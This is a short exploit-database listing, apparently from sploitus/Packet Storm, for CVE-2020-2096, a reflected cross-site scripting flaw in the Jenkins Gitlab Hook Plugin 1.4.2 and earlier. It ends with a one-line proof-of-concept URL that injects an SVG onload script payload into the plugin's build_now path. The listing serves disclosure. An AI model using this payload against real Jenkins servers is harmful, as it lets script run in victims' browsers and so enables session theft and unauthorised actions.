Exploit for Jenkins Gitlab Hook 1.4.2 Cross Site Scripting CVE-2020-2096

Name: Exploit for Jenkins Gitlab Hook 1.4.2 Cross Site Scripting CVE-2020-2096
Rating: 5 (105 reviews)

2020-01-16 | CVSS -0.0

## https://sploitus.com/exploit?id=PACKETSTORM:155967
# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting  
# Exploit Author: Ai Ho  
# Vendor Homepage : https://jenkins.io/  
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier  
# References: https://jenkins.io/security/advisory/2020-01-15/  
# CVE: CVE-2020-2096  
  
# PoC:  
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E